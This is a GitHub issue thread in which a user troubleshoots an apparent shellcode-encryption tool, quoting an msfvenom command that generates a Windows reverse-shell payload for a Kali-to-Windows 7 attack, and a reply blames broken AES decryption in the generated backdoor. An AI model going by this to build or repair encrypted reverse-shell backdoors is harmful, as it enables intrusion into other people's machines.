Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Not working #1

Open
joker8989 opened this issue May 6, 2019 · 1 comment
Open

Not working #1

joker8989 opened this issue May 6, 2019 · 1 comment

Comments

@joker8989
Copy link

tested your project really was looking for something like
so i got an error when i create a py file with an error:
shell()
WindowsError: exception: access violation writing 0x0000000002E9AE20

so i deleted the shell() function in line 59 file: shellcode_encoder.py
and i got no error but i didnot receive any connection :(

attacker - kali machine
victim - windows 7 machine

i used
msfvenom -p windows/shell_reverse_tcp lhost= lport= -f c

i tried also what you wrote in the README and i got error on kali when creating the msfvenom:

"-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload No encoder or badchars specified, outputting raw payload"

any ideas? does somebody succeeded to run the file and get a connection?

thankx anyway

**i know its old 2 years but i found this project exactly here i dont know if it is the same creator:
https://github.com/yashmundra/Shellcode-Encryption

pls reply

@fasetto
Copy link

fasetto commented Jul 9, 2019

It is not working because your generated backdoor can't decrypt the payload.
Something is wrong with aes decryption.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants